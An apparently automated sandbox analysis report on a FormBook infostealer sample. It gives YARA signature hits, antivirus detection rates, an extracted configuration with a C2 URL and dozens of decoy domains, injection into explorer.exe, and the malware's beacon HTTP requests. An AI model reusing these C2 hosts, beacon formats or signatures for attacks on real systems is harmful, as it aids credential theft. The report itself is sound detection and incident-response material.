00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9548:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x97b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x152e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14dd1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x153e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1555f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa1ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1404c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xaec3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b557:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18479:$sqlite3step: 68 34 1C 7B E1 0x1858c:$sqlite3step: 68 34 1C 7B E1 0x184a8:$sqlite3text: 68 38 2A 90 C5 0x185cd:$sqlite3text: 68 38 2A 90 C5 0x184bb:$sqlite3blob: 68 53 D8 7F 8C 0x185e3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: S22Ls0H4Sz.exe PID: 5492	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5f9be:$a1: 3C 30 50 4F 53 54 74 09 40 0x60dcf:$a1: 3C 30 50 4F 53 54 74 09 40 0x62283:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: explorer.exe PID: 3320	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1ff2f7:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: help.exe PID: 1068	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5e691:$a1: 3C 30 50 4F 53 54 74 09 40 0x6263e:$a1: 3C 30 50 4F 53 54 74 09 40 0xd27fb:$a1: 3C 30 50 4F 53 54 74 09 40 0x101349:$a1: 3C 30 50 4F 53 54 74 09 40 0x1029af:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 49 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.S22Ls0H4Sz.exe.380000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.S22Ls0H4Sz.exe.380000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.S22Ls0H4Sz.exe.380000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.S22Ls0H4Sz.exe.380000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.S22Ls0H4Sz.exe.380000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
0.0.S22Ls0H4Sz.exe.380000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.0.S22Ls0H4Sz.exe.380000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.0.S22Ls0H4Sz.exe.380000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.0.S22Ls0H4Sz.exe.380000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.0.S22Ls0H4Sz.exe.380000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 5 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: S22Ls0H4Sz.exe	ReversingLabs: Detection: 79%
Source: S22Ls0H4Sz.exe	Virustotal: Detection: 62%			Perma Link

Yara detected FormBook

Source: Yara match	File source: S22Ls0H4Sz.exe, type: SAMPLE
Source: Yara match	File source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY

Antivirus / Scanner detection for submitted sample

Source: S22Ls0H4Sz.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.bathroadtraders.co.uk/dr62/www.alacatimacunu.com	Avira URL Cloud: Label: malware
Source: http://www.85putao.com/dr62/	Avira URL Cloud: Label: malware
Source: http://www.85putao.com/dr62/www.engagementbuzz.com	Avira URL Cloud: Label: malware
Source: http://www.myenergyusage.co.uk/dr62/www.jingduxueyue.site	Avira URL Cloud: Label: malware
Source: http://www.bathroadtraders.co.uk/dr62/	Avira URL Cloud: Label: malware
Source: http://www.pilcoh.online/dr62/www.573415.com	Avira URL Cloud: Label: malware
Source: http://www.pilcoh.online	Avira URL Cloud: Label: malware
Source: http://www.myenergyusage.co.uk/dr62/	Avira URL Cloud: Label: malware
Source: http://www.pilcoh.online/dr62/	Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: S22Ls0H4Sz.exe

Joe Sandbox ML: detected

Source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.573415.com/dr62/"], "decoy": ["juanbrujo.com", "toptasker.africa", "g-labs.one", "1redbuckpermonth.com", "lasolutions.online", "beginagainmen.com", "iearn.site", "leading-car.ru", "codigosindiabetes.fun", "6y8ud.bond", "fptmarket.shop", "ctjhxv3.vip", "huluxia2.xyz", "piggg08.uk", "kms-pico-tools.com", "westonandcate.com", "giftrendz.com", "kqwdhrendfywefdst.top", "anchitchoudhary.com", "sistemodasi.net", "dotcomsolutions.co.uk", "anastaciachetty.com", "czh.ink", "complete-energy-performance.com", "kollanjurarna.se", "anotherdaythelabel.com", "fengkoo.com", "sunsongproductions20.com", "horhog.com", "chq-1.com", "cryptogame.rsvp", "jjzb10a.xyz", "raffletokens.com", "djmikehall.com", "baychocolates.online", "ecoskiusa.com", "myenergyusage.co.uk", "lipcarehub.africa", "isstrainingaz.com", "engagementbuzz.com", "jordanheritagita.online", "cheaphockeysticks.com", "rodeosonline.uk", "access247connect.info", "85putao.com", "josefa.wien", "pilcoh.online", "apothakeehair.com", "danadelseck.com", "dslimme.com", "alacatimacunu.com", "caplesssociety.com", "creativeirishgfts.com", "blografie.com", "hamfoods.com", "ballonstunisie.com", "jingduxueyue.site", "goldoholic.com", "millennialcore.net", "tacairservice.com", "betheme.shop", "bathroadtraders.co.uk", "jas757.com", "crossovers-82617.com"]}

Source: S22Ls0H4Sz.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: S22Ls0H4Sz.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: S22Ls0H4Sz.exe, 00000000.00000003.246037562.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000CFF000.00000040.00001000.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000003.243678010.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000002.00000003.281704027.000000000346B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000002.00000003.285219757.0000000003605000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: S22Ls0H4Sz.exe, 00000000.00000003.246037562.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000CFF000.00000040.00001000.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000003.243678010.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, help.exe, help.exe, 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000002.00000003.281704027.000000000346B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000002.00000003.285219757.0000000003605000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: help.pdbGCTL source: S22Ls0H4Sz.exe, 00000000.00000003.281707560.00000000007BC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: help.pdb source: S22Ls0H4Sz.exe, 00000000.00000003.281707560.00000000007BC000.00000004.00000020.00020000.00000000.sdmp

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.lipcarehub.africa
Source: C:\Windows\explorer.exe	Network Connect: 199.59.243.223 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ecoskiusa.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.573415.com/dr62/

Source: Joe Sandbox View

ASN Name: BODIS-NJUS BODIS-NJUS

Source: global traffic	HTTP traffic detected: GET /dr62/?8puHhBQ=B3AsJdO88NrgtU445P0Qj8HC++GHyC4yWybf6kHDuQcW/4YExfWyQzJk6gC5aIKrFNVGNibX8g==&i6APjV=qT6l4Jv HTTP/1.1Host: www.rodeosonline.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dr62/?8puHhBQ=VZq4zfyp13DysCUQIEaDi+qr0DM7rOJNp6jn4qBcW2Y5aFC4KzyQAlIVaF2k53XLC8aM4WwDig==&i6APjV=qT6l4Jv HTTP/1.1Host: www.ecoskiusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 199.59.243.223 199.59.243.223

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 20 Mar 2023 08:13:12 GMTContent-Type: text/htmlContent-Length: 291ETag: "6418120d-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.573415.com
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.573415.com/dr62/
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.573415.com/dr62/www.beginagainmen.com
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.573415.comReferer:
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.85putao.com
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.85putao.com/dr62/
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.85putao.com/dr62/www.engagementbuzz.com
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.85putao.comReferer:
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alacatimacunu.com
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alacatimacunu.com/dr62/
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alacatimacunu.com/dr62/www.g-labs.one
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alacatimacunu.comReferer:
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anastaciachetty.com
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anastaciachetty.com/dr62/
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anastaciachetty.com/dr62/www.85putao.com
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anastaciachetty.comReferer:
Source: explorer.exe, 00000001.00000000.256946409.0000000007A84000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.517521328.0000000007A84000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bathroadtraders.co.uk
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bathroadtraders.co.uk/dr62/
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bathroadtraders.co.uk/dr62/www.alacatimacunu.com
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bathroadtraders.co.ukReferer:
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.beginagainmen.com
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.beginagainmen.com/dr62/
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.beginagainmen.com/dr62/www.ctjhxv3.vip
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.beginagainmen.comReferer:
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ctjhxv3.vip
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ctjhxv3.vip/dr62/
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ctjhxv3.vip/dr62/www.myenergyusage.co.uk
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ctjhxv3.vipReferer:
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ecoskiusa.com
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ecoskiusa.com/dr62/
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ecoskiusa.com/dr62/www.lipcarehub.africa
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ecoskiusa.comReferer:
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.engagementbuzz.com
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.engagementbuzz.com/dr62/
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.engagementbuzz.com/dr62/www.raffletokens.com
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.engagementbuzz.comReferer:
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.g-labs.one
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.g-labs.one/dr62/
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.g-labs.oneReferer:
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jingduxueyue.site
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jingduxueyue.site/dr62/
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jingduxueyue.site/dr62/www.bathroadtraders.co.uk
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jingduxueyue.siteReferer:
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lipcarehub.africa
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lipcarehub.africa/dr62/
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lipcarehub.africa/dr62/www.anastaciachetty.com
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lipcarehub.africaReferer:
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.myenergyusage.co.uk
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.myenergyusage.co.uk/dr62/
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.myenergyusage.co.uk/dr62/www.jingduxueyue.site
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.myenergyusage.co.ukReferer:
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pilcoh.online
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pilcoh.online/dr62/
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pilcoh.online/dr62/www.573415.com
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pilcoh.onlineReferer:
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.raffletokens.com
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.raffletokens.com/dr62/
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.raffletokens.com/dr62/www.pilcoh.online
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.raffletokens.comReferer:
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rodeosonline.uk
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rodeosonline.uk/dr62/
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rodeosonline.uk/dr62/www.ecoskiusa.com
Source: explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rodeosonline.ukReferer:
Source: explorer.exe, 00000001.00000002.523897898.0000000013CBF000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000002.00000002.512081375.00000000041BF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com

Source: unknown

DNS traffic detected: queries for: www.rodeosonline.uk

Source: C:\Windows\explorer.exe

Code function: 1_2_047A8F82 getaddrinfo,setsockopt,recv,

1_2_047A8F82

Source: global traffic	HTTP traffic detected: GET /dr62/?8puHhBQ=B3AsJdO88NrgtU445P0Qj8HC++GHyC4yWybf6kHDuQcW/4YExfWyQzJk6gC5aIKrFNVGNibX8g==&i6APjV=qT6l4Jv HTTP/1.1Host: www.rodeosonline.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dr62/?8puHhBQ=VZq4zfyp13DysCUQIEaDi+qr0DM7rOJNp6jn4qBcW2Y5aFC4KzyQAlIVaF2k53XLC8aM4WwDig==&i6APjV=qT6l4Jv HTTP/1.1Host: www.ecoskiusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: S22Ls0H4Sz.exe, 00000000.00000002.284494353.00000000007A9000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: S22Ls0H4Sz.exe, type: SAMPLE
Source: Yara match	File source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
